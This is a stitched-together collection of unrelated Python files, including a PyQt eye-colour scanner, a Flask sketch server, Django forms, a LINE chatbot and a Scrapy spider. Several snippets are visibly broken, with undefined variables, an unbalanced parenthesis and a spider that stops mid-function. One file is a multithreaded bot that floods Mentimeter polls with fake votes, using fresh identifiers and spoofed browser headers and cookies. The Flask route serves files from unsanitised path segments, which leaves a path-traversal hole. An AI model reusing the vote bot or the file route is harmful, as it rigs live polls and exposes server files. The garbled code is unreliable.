self.path = QFileDialog.getOpenFileName(self,'Choose image','Desktop','Image files (*.png *.jpg)')[0]
print(path)
self.img = Image.open(path)
thumb = self.img.thumbnail((170,170))
self.selectLbl.setPixmap(QtGui.QPixmap.fromImage(ImageQt.ImageQt(thumb)))
self.selectBtn.setStyleSheet(base_style + "red;color:white;")
self.scanBtn.setStyleSheet(base_style + "green;color:white;")
self.selectBtn.setText("Скасувати вибір")
cvimg = cv2.imread(path)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
eyeCascade = cv2.CascadeClassifier('haarcascade_eye.xml')
eyes = eyeCascade.detectMultiScale(
gray,
scaleFactor=1.3,
minNeighbors=3,
minSize=(30, 30)
)
if len(eyes) != 1:
QMessageBox.warning(self,"Dr.Aid","Something went wrong...")
self.clearAll()
except:
QMessageBox.warning(self,"Dr.Aid","Something went wrong...")
#========================
#Scan photo
#========================
def scanPhoto(self):
if self.img == None:
QMessageBox.warning(self,"Dr.Aid","Something went wrong...")
return None
#============================#
# #
# WRITE TOMORROW!!! #
# #
#============================#
cvimg = cv2.imread(self.path)
maxw,maxd,color = 0,0,""
colors = {((20,19,8),(210,165,126)):"blue",((6,23,66),(53,58,103)):"brown", ((22,25,30),(169,164,144)):"grey"}
for i in colors:
hsv_min = np.array(i[0], np.uint8)
hsv_max = np.array(i[1], np.uint8)
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV )
thresh = cv2.inRange(hsv, hsv_min, hsv_max)
image = Image.fromarray(cv2.cvtColor(thresh,cv2.COLOR_BGR2RGB))
b,w = 0,0
for row in thresh:
for pixel in row:
if pixel==255:
w+=1
else:
b+=1
if w>maxw:
maxw = w
color = colors[i]
maxd = i
print("White: ", w,"Black: ",b,"color",colors[i])
print("Eye color: ",color)
hsv_min = np.array(maxd[0], np.uint8)
hsv_max = np.array(maxd[1], np.uint8)
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV )
thresh = cv2.inRange(hsv, hsv_min, hsv_max)
showimage = Image.fromarray(cv2.cvtColor(thresh,cv2.COLOR_BGR2RGB))
showimage.thumbnail((170,170))
self.selectLbl.setPixmap(QtGui.QPixmap.fromImage(ImageQt.ImageQt(showimage))))
self.reztextLbl.setText("Eye color: "+color)
#=========================
#Clear all fields
#=========================
def clearAll(self):
# print(2)
img = None
self.selectLbl.setPixmap(QtGui.QPixmap.fromImage(ImageQt.ImageQt(Image.open("white.png"))))
self.rezultLbl.setPixmap(QtGui.QPixmap.fromImage(ImageQt.ImageQt(Image.open("white.png"))))
self.selectBtn.setText("Виберіть фотографію")
self.selectBtn.setStyleSheet(base_style + "green;color:white;")
self.scanBtn.setStyleSheet(base_style +"red;color:white;")
self.reztextLbl.setText("")
#=========================
#Choosing function after clicking a button
#=========================
def chooseButtonClick(self):
print("I am clicked!!!")
if self.selectBtn.text() == "Виберіть фотографію":
self.getImage()
else:
self.clearAll()
#self.pushButton.setStyleSheet(base_style + ("red" if self.pushButton.text() =="Скасувати вибір" else "green") + ";color:white;")
#======================
#Get statistics
#======================
def getStat(self):
QMessageBox.warning(self,"Dr.Aid","In developing...")
def main():
app = QtWidgets.QApplication(sys.argv)
window = App()
window.show()
app.exec_()
if __name__ == "__main__":
main()
|
from typing import List
def checkio(numbers: List[int]) -> int:
if not numbers:
return 0
return sum(numbers[::2]) * numbers[-1]
|
# my_dict ={}
# my_dict['name']="veeresh"
# my_dict['age']=29
#
# for k,l in my_dict.items():
# print(k , l)
class note:
ip = ""
url = 5
obj1 = note
obj2 = note
print()
|
from flask import Flask, render_template, send_file, abort
from pathlib import Path
import json
from sys import version_info
from dataclasses import dataclass
from time import time
app = Flask(__name__)
app.logger.debug(f'{version_info}')
mypath = Path('.')
statics = mypath / 'static'
tstart = time()
@dataclass
class Sketch:
'''Contains Sketch data.'''
name : str
desc : str
@app.route('/')
def start():
sketches = []
for p in mypath.glob('*.proj'):
if not p.is_dir(): continue
sketch = p.stem
app.logger.debug(f'found sketch {sketch}')
sketches.append(Sketch(sketch, '?'))
return render_template('index.html', sketches=sketches)
@app.route('/sketch/<sketch>')
def sketch_page(sketch):
sketch_dir = mypath / (sketch + '.proj')
if not sketch_dir.is_dir():
abort(404)
config_file = sketch_dir / 'cfg.json'
if not config_file.exists():
abort(404)
with config_file.open('r') as jf:
config = json.load(jf)
if not "dom" in config: config["dom"] = False
if not "sound" in config: config["sound"] = False
mtimes = []
for f in sketch_dir.iterdir():
if f.is_dir(): continue
mtimes.append(f.stat().st_mtime)
return render_template('sketch.html', sketch=sketch, scripts=config['script_list'],
title=sketch, dom=config["dom"], sound=config["sound"], latest=max(mtimes)-tstart)
@app.route('/sketch/<sketch>/<script>')
def sketch(sketch, script):
if sketch in ('p5', 'common', 'static'):
return send_file(mypath / sketch / script)
else:
return send_file(mypath / (sketch+'.proj') / script)
|
import numpy as np
import random
import pandas as pd
from sampling_train_test_split import*
import numpy.matlib
class similarity(object):
"""docstring for similarity"""
def fit(self,train_adj):
"矩阵维度大于1"
train = np.matrix(train_adj)
if train.ndim < 2:
raise Exception("Invalid ndim!", train.ndim)
if train.size < 2:
raise Exception("Invalid size!", train.size)
if train.shape[0] != train.shape[1]:
raise Exception("Invalid shape!", train.shape)
class CommonNeighbors(similarity):
"""
CommonNeighbors 求交集
"""
def fit(self,train_adj):
similarity.fit(self,train_adj)
train_adj = np.matrix(train_adj)
return train_adj * train_adj
class Jaccard(similarity):
"""
两顶点邻居的交集与并集之比
"""
def fit(self,train_adj):
similarity.fit(self,train_adj)
train_adj = np.matrix(train_adj)
numerator = train_adj * train_adj
deg0 = np.matlib.repmat(train_adj.sum(0),len(train_adj),1)
deg1 = np.matlib.repmat(train_adj.sum(1),1,len(train_adj))
denominator = deg0 + deg1 - numerator
sim = numerator/denominator
sim[np.isnan(sim)] = 0
sim[np.isinf(sim)] = 0
return sim
#denominator =
'''
test
nodepair_set = [[0,1],[0,2],[1,2],[1,5],[1,3],[3,4],[3,5],[3,4],[2,5],[2,0]]
Ja = Jaccard()
vertex_dic = create_vertex(nodepair_set)
matrix_train = create_adjmatrix(nodepair_set,vertex_dic)
print(vertex_dic)
print(matrix_train)
print(Ja.fit(matrix_train))
'''
|
# https://codeforces.com/problemset/problem/1250/F
n = int(input())
for i in range(int(n ** 0.5), 0, -1):
if n % i == 0:
print(2 * ((n // i) + i))
break
|
import bpy
import random
objects = bpy.data.objects
occupied_index = {'none':0}
for obj in objects:
if obj.pass_index != 0:
occupied_index[obj] = obj.pass_index
#print(occupied_index)
accepted_objects = []
for obj in objects:
if (obj.type == 'MESH' or obj.type == 'EMPTY') and obj not in occupied_index.keys():
accepted_objects.append(obj)
index_list = list(range(len(accepted_objects) + len(set(occupied_index.values()))))
accepted_index = list(set(index_list) - set(occupied_index.values()))
#print(len(accepted_index))
#print(len(accepted_objects))
for obj in accepted_objects:
val = random.choice(accepted_index)
obj.pass_index = val
accepted_index.remove(val)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import tkinter as tk
class ProgressBar(tk.Text):
def __init__(self, parent, bg, fg, font, color, max_value):
super(ProgressBar, self).__init__(parent, bd=0, pady=0, padx=0,
highlightthickness=0)
self.tag_config('colored', foreground=color)
self.insert(tk.END, '•' * max_value)
self.configure(bg=bg, fg=fg,
width=max_value - 4, height=1, # bad hack :(
font=font, state=tk.DISABLED)
def set_value(self, value):
self.configure(state=tk.NORMAL)
self.tag_remove('colored', '1.0', tk.END)
self.tag_add('colored', '1.0', '1.%d' % value)
self.configure(state=tk.DISABLED)
|
import numpy as np
__all__ = [
'angle_between',
'cat',
'derivative',
'ecat',
'norm',
'norm0',
'projection',
'unit',
]
def angle_between(a, b, axisa=0, axisb=0):
"""Compute the angle between arrays of vectors `a` and `b`."""
import ein
return np.arccos(ein.dot(a, b, axisa=axisa, axisb=axisb) /
(norm(a, axisa) * norm(b, axisb)))
def cat(*arrays):
"""Concatenate arrays along a new prepended axis."""
return np.concatenate([a[np.newaxis] for a in arrays])
def derivative(t):
"""Create a callable that returns the derivative of its argument."""
if t.ndim > 1:
try:
dt = np.gradient(t)[0]
except ValueError:
dt = np.gradient(np.squeeze(t))[..., np.newaxis]
dt = np.rollaxis(dt, -1, 0)
else:
dt = np.gradient(t)
def gradient(array):
if dt.ndim == 1:
return np.gradient(array, dt)
else:
return ecat(*[np.gradient(x, dx)
for x, dx in zip(np.rollaxis(array, -1, 0), dt)])
return gradient
def ecat(*arrays):
"""Concatenate arrays along a new appended axis."""
return np.concatenate([a[..., np.newaxis] for a in arrays], axis=-1)
def norm(array, axis=0):
"""Norm of `array` along `axis`."""
try:
return np.linalg.norm(array, axis=axis)
except TypeError:
return np.sqrt(sum(a ** 2 for a in np.rollaxis(array, axis)))
def norm0(array):
"""Compute the norm of an array along the first axis."""
return norm(array, axis=0)
def projection(a, b, axisa=0, axisb=0):
"""Compute the component of `a` in the direction of `b`."""
import ein
return ein.dot(a, b, axisa=axisa, axisb=axisb) / norm(b, axisb)
def unit(array, axis=0):
"""Compute the unit vectors of `array` along `axis`."""
return array / norm(array, axis)
|
def minimumBribes(q):
bribes = 0
swap = True
last_ind = len(q) - 1
status = 'Normal'
for ind, v in enumerate(q):
if v - (ind+1) > 2:
status = 'Too chaotic'
while swap:
temp_q = q.copy()
for j in range(last_ind):
if q[j] > q[j+1]:
temp = q[j+1]
q[j+1] = q[j]
q[j] = temp
bribes += 1
if temp_q == q:
swap = False
if status == 'Too chaotic':
print(status)
else:
print(bribes) |
# import json
# import grequests
# import requests
# import _thread
# import time
from tkinter import ttk
class Bot:
threads = 0
numberOfRequests = 0
numberOfRequests *= 1
requestCount = 0
requestDoneCount = 0
voteIdx = 0
voteText = []
parsedId = ""
parsedKey = ""
done = False
json = __import__('json')
grequests = __import__('grequests')
requests = __import__('requests')
_thread = __import__('_thread')
time = __import__('time')
mttkinter = __import__('mttkinter')
tk = mttkinter.mtTkinter
tkinter = __import__('tkinter', globals(), locals(), ['ttk'], 0)
ttk = tkinter.ttk
threading = __import__('threading')
math = __import__('math')
def updateProgress(self):
self.percentage = round(100*(self.requestDoneCount/self.numberOfRequests), 1)
print(self.percentage)
oldLabel = self.logLabel.cget("text")
if oldLabel != str(self.percentage) + '%':
self.logLabel.configure(text=(str(self.percentage) + '%'))
barStr ='__________'
barStrList = list(barStr)
for idx in range(self.math.floor(self.percentage/10)):
barStrList[idx] = '#'
barStr = ''.join(barStrList)
self.logText.configure(text=barStr)
if self.percentage == 100.0:
self.stop()
def printw(self, string):
# self.addText(string)
# self.root.after(5000, lambda: self.addText(string))
pass
def addText(self, string):
old = self.logText.cget("text")
new = old+"\n"+string
self.logText.configure(text=new)
def __init__(self, threadToCall, parsedId, voteText, threads, numberOfRequests, perWord):
self.threadToCall = threadToCall
self.done = False
self.parsedId = parsedId
self.voteText = voteText
self.threads = threads
self.numberOfRequests = numberOfRequests
if perWord:
self.numberOfRequests *= len(self.voteText)
self.root = self.tk.Tk()
self.root.bind("<Destroy>", self.destroy)
self.logLabel = self.tk.LabelFrame(self.root, text="0%")
self.logText=self.tk.Label(self.logLabel, text='__________', height=1, width=10, anchor='nw', justify='left')
self.logLabel.pack(padx=10, pady=10, side='top')
self.logText.pack()
self.stopBtn = self.ttk.Button(self.root, text='Stop', command=(lambda: self.stop()))
self.stopBtn.pack(padx=10, pady=10, side='bottom')
self.startThreads()
self.tk.mainloop()
def destroy(self, event):
self.stop()
def stop(self):
self.done = True
self.stopBtn.update()
# self.time.sleep(2)
self.root.destroy()
self.callThread()
# self.exit()
def callThread(self):
self.threadToCall.start()
# def defNew(voteTextIn, threadsIn, numberOfRequestsIn, numberOfRequestsMultiIn, requestCountIn, requestDoneCountIn):
# reset()
# self.threads = threadsIn
# self.numberOfRequests = numberOfRequestsIn
# self.numberOfRequests *= numberOfRequestsMultiIn
# self.requestCount = requestCountIn
# self.requestDoneCount = requestDoneCountIn
# self.voteText = voteTextIn
# def reset():
# self.threads = 0
# self.numberOfRequests = 0
# self.requestCount = 0
# self.requestDoneCount = 0
# self.voteIdx = 0
def vote(self, voteIn):
# voteIn is the text to be voted with
newdata = {"question_type":"wordcloud","vote":voteIn}
# s = grequests.post('https://www.govote.at/core/identifier')
#print(s)
# identifier = s.json()['identifier']
# It seems the page rejects GET requests that do not identify a User-Agent.
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
content = ""
# urls = ['https://www.menti.com/core/identifier'] # old
urls = ['https://www.menti.com/core/identifiers'] # new
rs = (self.grequests.post(u, headers=headers) for u in urls)
requests = self.grequests.map(rs)
for response in requests:
content = response.content
identifier = self.json.loads(content)['identifier']
self.printw(identifier)
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36', 'accept': 'application/json','accept-encoding': 'gzip, deflate, br','accept-language': 'en-US,en;q=0.9','content-lengt': '42','content-type': 'application/json; charset=UTF-8','cookie': '_ga=GA1.2.1555705289.1573573495; _fbp=fb.1.1573573435740.1944003412; identifier1='+identifier+'; _gid=GA1.2.1316845992.1575545568; _gat=1; _gat_UA-23693781-9=1; _gat_UA-23693781-3=1','origin': 'https://www.menti.com','referer': 'https://www.menti.com/'+self.parsedId,'sec-fetch-mode': 'cors','sec-fetch-site': 'same-origin','user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36 OPR/65.0.3467.48','x-identifier': identifier}
# print(headers)
content = ""
# urls2 = ['https://www.govote.at/core/votes/'+self.parsedKey] # old
urls2 = ['https://www.menti.com/core/votes/'+self.parsedKey] # new
rs = (self.grequests.post(u, json = newdata, headers = headers) for u in urls2)
requests = self.grequests.map(rs)
for response in requests:
content = response
print(content.content)
self.printw(content)
# vote(voteText)
def threadFun(self, threadName):
# time.sleep(delay)
# global requestCount
# global voteIdx
# global voteText
# global requestDoneCount
while self.requestCount < self.numberOfRequests and self.done is False:
self.requestCount += 1
if self.voteIdx == len(self.voteText):
self.voteIdx = 0
text = self.voteText[self.voteIdx]
self.voteIdx += 1
# vote vvv
self.printw(str(threadName) + " Requests " + str(self.requestCount) + " with " + str(text))
self.vote(text)
self.requestDoneCount += 1
self.updateProgress()
def startThreads(self):
# It seems the page rejects GET requests that do not identify a User-Agent.
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
# s = self.requests.get('https://www.menti.com/core/objects/vote_keys/'+self.parsedId, headers=headers) # old
s = self.requests.get('https://www.menti.com/core/vote-keys/'+self.parsedId+'/series', headers=headers) # new
string = s.text
jsondata = self.json.loads(string)
question = jsondata['questions'][0]
parsedKey = question['public_key']
self.parsedKey = parsedKey
self.printw("Key: " + str(parsedKey))
for idx in range(self.threads):
# self._thread.start_new_thread( self.threadFun, ("Thread-" + str(idx), ) )
t = self.threading.Thread(target=(lambda: self.threadFun("Thread-" + str(idx), )))
t.start()
self.time.sleep(0.2)
|
from pymongo import MongoClient
class DB:
def __init__(self):
client = MongoClient()
self.db = client.get_database("hackathon")
self.reports = self.db.get_collection("reports")
def insert_report(self, li_num, _date, _time, img,area):
report = {
'license_number': li_num,
'date': _date,
'time': _time,
'image': img,
'area': area,
'status': 'not sent'
}
self.reports.insert_one( report) |
from django.db import models
from django.contrib.auth.models import User
class Entry(models.Model):
entry_title = models.CharField(max_length=50)
entry_text = models.TextField()
entry_date = models.DateTimeField(auto_now_add=True)
entry_author = models.ForeignKey(User, on_delete=models.CASCADE)
class Meta:
verbose_name_plural = "entries"
def __str__(self):
return f'{self.entry_title}'
class Comment(models.Model):
entry = models.ForeignKey('entries.Entry', on_delete=models.CASCADE, related_name='comments')
comment_author = models.ForeignKey(User, on_delete=models.CASCADE)
comment_text = models.TextField()
comment_date = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.comment_text |
# -*- coding: utf-8 -*-
import os
class Website(object):
"""
Creates the website.
"""
def __init__(self, env, *args, **kwargs):
self.env = env
self.map_file = os.path.join(self.env.temp_res_dir, 'map.html')
# Read in the html template.
f = open(os.path.join(self.env.res_dir, 'upperPart.html'))
self.upperPart = f.read()
f.close()
f = open(os.path.join(self.env.res_dir, 'lowerPart.html'))
self.lowerPart = f.read()
f.close()
def startup(self):
# Preprocess stations.
self.processStations()
# Get the boundaries.
self.getBoundaries()
# Create the middle part of the html.
self.createMiddle()
self.createHtml()
def getBoundaries(self):
lats = []
longs = []
for station in self.stations:
info = station[2]
lats.append(info['latitude'])
longs.append(info['longitude'])
# XXX: Ugly hack only for Tobis Computer. Needs a real workaround but
# should work so far. Maybe change the order of loading the submodules
# during the startup phase?
try:
self.bounds = (min(longs), max(longs), min(lats), max(lats))
except ValueError:
self.bounds = (47.0, 49.0, 11.0, 12.0)
def createHtml(self):
html = self.upperPart + self.middlePart + self.lowerPart
f = open(self.map_file, 'w')
f.write(html)
f.close()
def processStations(self):
nw_dict = self.env.seishub.networks
self.stations = []
self.omitted_stations = []
networks = nw_dict.keys()
for network in networks:
if network == 'Server' or network == 'Date':
continue
st_dict = nw_dict[network]
stations = st_dict.keys()
for station in stations:
info = st_dict[station]['info']
if not len(info):
self.omitted_stations.append('%s.%s' % (network, station))
continue
self.stations.append([network, station, info])
def createMiddle(self):
center_long = (self.bounds[0] + self.bounds[1]) / 2.0
center_lat = (self.bounds[2] + self.bounds[3]) / 2.0
part = 'map.setCenter(new GLatLng(%f, %f), 6);' % (center_lat,
center_long)
part += 'map.setUIToDefault();'
for _i, station in enumerate(self.stations):
info = station[2]
lat = info['latitude']
long = info['longitude']
station_name = info['station_name']
station_id = '%s' % station[1]
elevation = info['elevation']
path = '%s' % station[1]
part += """
var point%i = new GPoint(%f,%f);
var html%i = "<h2>%s</h2> <p>%s<br>Elevation: %f</p>";
var iconOptions = {};
iconOptions.width = 40;
iconOptions.height = 32;
iconOptions.primaryColor = "#FF0000";
iconOptions.label = "%s";
iconOptions.labelSize = 0;
iconOptions.labelColor = "#000000";
iconOptions.shape = "roundrect";
var newIcon = MapIconMaker.createFlatIcon(iconOptions);
var beck%i = new GMarker(point%i, {icon: newIcon});
GEvent.addListener(beck%i, "click", function()
{beck%i.openInfoWindowHtml(html%i)});
map.addOverlay(beck%i);
""" % (_i, long, lat, _i, path, station_name,
elevation, station_id, _i, _i, _i,
_i, _i, _i)
self.middlePart = part
|
import gym
import sys
import math
import random
import numpy as np
import matplotlib.pyplot as plt
episodes_nb = 1000
env = gym.make('CartPole-v0')
episode_rewards = np.zeros(episodes_nb)
episode_exploration = np.zeros(episodes_nb)
Q = {}
# Contains the traces for each states
Z = {}
alpha = 0.8
discount_factor = 0.9
Lambda = 0.7
for episode_i in range(episodes_nb):
sys.stdout.write("\r" + str(episode_i+1) + "/" + str(episodes_nb))
sys.stdout.flush()
observations = env.reset()
state = ''
for o in observations: state += str(math.floor(o))
if state not in Q:
Q[state] = np.zeros(env.action_space.n)
Z[state] = np.zeros(env.action_space.n)
done = False
while not done:
if random.random() < 0.1:
episode_exploration[episode_i] += 1
action = env.action_space.sample()
else:
action = np.argmax(Q[state])
observations, reward, done, _ = env.step(action)
nextstate = ''
for o in observations: nextstate += str(math.floor(o))
if nextstate not in Q:
Q[nextstate] = np.zeros(env.action_space.n)
Z[nextstate] = np.zeros(env.action_space.n)
episode_rewards[episode_i] += reward
target = reward + discount_factor * np.argmax(Q[nextstate]) - Q[state][action]
Z[state][action] = 1
for s in Q:
Q[s] += alpha * target * Z[s]
Z[s] *= Lambda
state = nextstate
plt.plot(
range(episodes_nb), episode_rewards,
range(episodes_nb), episode_exploration
)
plt.ylabel('Reward by episode')
plt.show()
|
from __future__ import unicode_literals
import warnings
from django import forms
from django.forms.util import flatatt
from django.template import loader
from django.utils.datastructures import SortedDict
from django.utils.encoding import force_bytes
from django.utils.html import format_html, format_html_join
from django.utils.http import urlsafe_base64_encode
from django.utils.safestring import mark_safe
from django.utils.text import capfirst
from django.utils.translation import ugettext, ugettext_lazy as _
from django.contrib.auth import authenticate, get_user_model
from django.contrib.auth.models import User
from django.contrib.auth.hashers import UNUSABLE_PASSWORD_PREFIX, identify_hasher
from django.contrib.auth.tokens import default_token_generator
from django.contrib.sites.models import get_current_site
from django import forms
class UserCreationForm(forms.ModelForm):
"""
A form that creates a user, with no privileges, from the given username and
password.
"""
error_messages = {
'duplicate_username': _("A user with that username already exists."),
'password_mismatch': _("The two password fields didn't match."),
}
#first_name = forms.CharField(required=requires_name, max_length=100)
#last_name = forms.CharField(required=requires_name, max_length=100)
#email1 = forms.EmailField(label=_("Email"),required=requires_email)
#email2 = forms.EmailField(label=_("Email confirmation"),required=requires_email)
username = forms.RegexField(label=_("Username"), max_length=30,
regex=r'^[\w.@+-]+$',
error_messages={
'invalid': _("This value may contain only letters, numbers and "
"@/./+/-/_ characters.")})
password = forms.CharField(label=_("Password"),
widget=forms.PasswordInput)
password2 = forms.CharField(label=_("Password confirmation"),
widget=forms.PasswordInput)
username.widget.attrs["placeholder"]=username.label;
password.widget.attrs["placeholder"]=password.label;
password2.widget.attrs["placeholder"]=password2.label;
username.widget.attrs["class"]="form-control";
password.widget.attrs["class"]="form-control";
password2.widget.attrs["class"]="form-control";
class Meta:
model = User
fields = ("username",)
def clean_username(self):
# Since User.username is unique, this check is redundant,
# but it sets a nicer error message than the ORM. See #13147.
username = self.cleaned_data["username"]
try:
User._default_manager.get(username=username)
except User.DoesNotExist:
return username
raise forms.ValidationError(
self.error_messages['duplicate_username'],
code='duplicate_username',
)
def clean_password2(self):
password = self.cleaned_data.get("password")
password2 = self.cleaned_data.get("password2")
if password and password2 and password != password2:
raise forms.ValidationError(
self.error_messages['password_mismatch'],
code='password_mismatch',
)
return password2
def save(self, commit=True):
user = super(UserCreationForm, self).save(commit=False)
user.set_password(self.cleaned_data["password"])
if commit:
user.save()
return user
class AuthenticationForm(forms.Form):
"""
Base class for authenticating users. Extend this to get a form that accepts
username/password logins.
"""
username = forms.CharField(label=_("Username"),max_length=254)
password = forms.CharField(label=_("Password"), widget=forms.PasswordInput)
username.widget.attrs["placeholder"]=username.label;
password.widget.attrs["placeholder"]=password.label;
username.widget.attrs["class"]="form-control";
password.widget.attrs["class"]="form-control";
error_messages = {
'invalid_login': _("Please enter a correct %(username)s and password. "
"Note that both fields may be case-sensitive."),
'inactive': _("This account is inactive."),
}
def __init__(self, request=None, *args, **kwargs):
"""
The 'request' parameter is set for custom auth use by subclasses.
The form data comes in via the standard 'data' kwarg.
"""
self.request = request
self.user_cache = None
super(AuthenticationForm, self).__init__(*args, **kwargs)
# Set the label for the "username" field.
UserModel = get_user_model()
self.username_field = UserModel._meta.get_field(UserModel.USERNAME_FIELD)
if self.fields['username'].label is None:
self.fields['username'].label = capfirst(self.username_field.verbose_name)
def clean(self):
username = self.cleaned_data.get('username')
password = self.cleaned_data.get('password')
if username and password:
self.user_cache = authenticate(username=username,
password=password)
if self.user_cache is None:
raise forms.ValidationError(
self.error_messages['invalid_login'],
code='invalid_login',
params={'username': self.username_field.verbose_name},
)
elif not self.user_cache.is_active:
raise forms.ValidationError(
self.error_messages['inactive'],
code='inactive',
)
return self.cleaned_data
def check_for_test_cookie(self):
warnings.warn("check_for_test_cookie is deprecated; ensure your login "
"view is CSRF-protected.", DeprecationWarning)
def get_user_id(self):
if self.user_cache:
return self.user_cache.id
return None
def get_user(self):
return self.user_cache
|
##########聊天機器人,聊天功能、關鍵字資料呼叫##########
from .cowpiDB import *
from .crawlerFunc import *
from datetime import datetime, timedelta
import pytz, re, random
####關鍵字功能
def AQI(site):
return getAQI(site)
def Weather(site):
PATTERN = '((明|後|大後)[早晚天]|[一下]週|[早晚]上|中午|凌晨|未來)'
return [getWeather(site, True), 0] if re.search(PATTERN, site) else [getWeather(site), 1]
def DevinateRes():
return int(random.random()*4)
####主聊天功能
##學說話
def learn(lineMessage, channelId, e_source):
lineMes = [x for x in lineMessage.replace(";",";").split(';') if x != ""]
#若語法正確才加入詞條
if(len(lineMes)<3):
return ["窩聽不懂啦!", 0, 'text']
else:
insStatement(lineMes[1], lineMes[2:], channelId, e_source.type)
return ["好哦的喵~", 0, 'text']
##忘記
def forget(lineMessage, channelId):
lineMes = [x for x in lineMessage.replace(";",";").split(';') if x != ""]
#若語法正確才刪除詞條
if(len(lineMes)<3):
return ["窩聽不懂啦!", 0, 'text']
else:
delStatement(lineMes[1], lineMes[2:], channelId)
return ["好哦的喵~", 0, 'text']
##壞壞,批次降低資料庫內本次回話的關鍵字權重
def bad(channelId):
adjustPrio(queryReceived(channelId, 1)[0][0], queryReply(channelId, 1)[0][0], -2)
return ["好哦的喵~", 0, 'text']
##回覆(隨機回覆)
def chat(lineMessage, channelId):
rand = 1 if lineMessage[0:3]=='牛批貓' or lineMessage[0:2]=='抽籤' else 0
firstIndex = 0 if not rand else 3 if lineMessage[0:3]=='牛批貓' else 2
response = resStatement(lineMessage[firstIndex:], channelId, rand)
boolean = 0 if response=="窩聽不懂啦!" else 1
type = 'image' if response[0:8]=='https://' and any(x in response for x in ['.jpg','.jpeg','.png']) else 'text'
return [response, boolean, type]
##成功回話時增加權重或加入新詞
def validReply(lineMessage, reply):
adjustPrio(lineMessage, reply, 1)
##齊推
def echo2(lineMessage, channelId):
if all(lineMessage!=x[0] or x[1]!='text' for x in queryReceived(channelId, 3)): return False
elif queryReply(channelId, 1)[0][0]==lineMessage: return False
else: return True
##你會說什麼
def allLearn(channelId):
return allStatement(channelId)
####功能開關
def globaltalk(lineMessage, channelId):
if "可以說別人教的話" in lineMessage: editChannelGlobalTalk(channelId, 1)
elif any(s in lineMessage for s in ["不可以說別人教的話", "不能說別人教的話"]): editChannelGlobalTalk(channelId, 0)
return "好哦的喵~"
def mute(lineMessage, channelId):
if any(s in lineMessage for s in ["牛批貓說話", "牛批貓講話"]): editChannelMute(channelId, 0)
elif any(s in lineMessage for s in ["牛批貓安靜", "牛批貓閉嘴"]): editChannelMute(channelId, 1)
return "好哦的喵~"
def currentStatus(channelId):
status = queryUser(channelId)
return ["所有人教的" if status[2] else "這裡教的", "安靜" if status[3] else "可以說話", status[2], status[3]]
|
from functools import wraps
from database.crud import UserCRUD
from exceptions import UnauthorizedError
from utils import JWT
__all__ = ["authorized"]
def authorized(f):
@wraps(f)
async def decorated_function(request, *args, **kwargs):
token = request.token
if token is not None:
decoded_token = JWT.decode_jwt_token(token)
if decoded_token is not None:
auth_user = await UserCRUD.find_by_id(decoded_token.get("user_id"))
if auth_user:
kwargs["user"] = auth_user
return await f(request, *args, **kwargs)
raise UnauthorizedError()
return decorated_function
|
from django.urls import path
from . import views
from django.views.generic import TemplateView
# https://docs.djangoproject.com/en/2.1/topics/http/urls/
urlpatterns = [
path('', views.DogList.as_view(), name='dogs'),
path('main/create/', views.DogCreate.as_view(), name='dog_create'),
path('main/<int:pk>/update/', views.DogUpdate.as_view(), name='dog_update'),
path('main/<int:pk>/delete/', views.DogDelete.as_view(), name='dog_delete'),
path('lookup/', views.TypeView.as_view(), name='type_list'),
path('lookup/create/', views.TypeCreate.as_view(), name='type_create'),
path('lookup/<int:pk>/update/', views.TypeUpdate.as_view(), name='type_update'),
path('lookup/<int:pk>/delete/', views.TypeDelete.as_view(), name='type_delete'),
]
|
# -*- coding: utf-8 -*-
import scrapy
import time
import json
import re
import pymongo
from pandas.core.frame import DataFrame
from lxml import etree
class ChexiuspiderSpider(scrapy.Spider):
name = 'chexiu_car'
allowed_domains = ['chexiu.com']
start_urls = [f'https://www.chexiu.com/index.php?r=api/car/GetHotBrandWithNoPrice&pagesize=300']
@classmethod
def update_settings(cls, settings):
settings.setdict(
getattr(cls, 'custom_debug_settings' if getattr(cls, 'is_debug', False) else 'custom_settings', None) or {},
priority='spider')
def __init__(self, **kwargs):
super(ChexiuspiderSpider, self).__init__(**kwargs)
self.counts = 0
is_debug = True
custom_debug_settings = {
'MYSQL_SERVER': '192.168.1.94',
'MYSQL_DB': 'chexiu',
'MYSQL_TABLE': 'chexiu',
'MONGODB_SERVER': '192.168.1.94',
'MONGODB_DB': 'chexiu',
'MONGODB_COLLECTION': 'chexiu_car',
'CONCURRENT_REQUESTS': 8,
'DOWNLOAD_DELAY': 0,
'LOG_LEVEL': 'DEBUG',
}
def parse(self, response):
data = response.text.split("callback(")[-1].replace(')', '')
json_data = json.loads(data)
for car in json_data["data"]:
brandname = car["title"]
cat_id = car["cat_id"]
url = f'https://sh.chexiu.com/search/list-{cat_id}-0-0-0-0-0-0-1.html'
yield scrapy.Request(url=url, callback=self.parse_familycars, meta={"info": (cat_id, brandname)})
def parse_familycars(self, response):
brand_id, brandname = response.meta.get('info')
# print(cat_id, brandname)
family_cars = response.xpath('//div[@class="m g-fl"]')
for family_car in family_cars:
family_url = family_car.xpath('./a/@href').get()
family_id = re.sub(r'\D', '', family_url)
familyname = family_car.xpath('.//div[@class="text"]/h3/text()').get()
url = f'https://www.chexiu.com/index.php?r=site/api/GetCarAllByStyleWithMoreInfoGroupEngin&styleid={family_id}'
yield scrapy.Request(url=url, callback=self.parse_cars,
meta={"info": (brand_id, brandname, familyname, url)})
def parse_cars(self, response):
# item = dict()
brand_id, brandname, familyname, url = response.meta.get('info')
data = response.text.split("callback(")[-1].replace(')', '')
json_data = json.loads(data)
for engine_list in json_data['data']:
engine = engine_list['engine']
for car_list in engine_list['carList']:
# engine = engine_list['engine']
family_id = car_list['model_id']
vehicle_id = car_list['car_id']
vehicle = car_list['car_name']
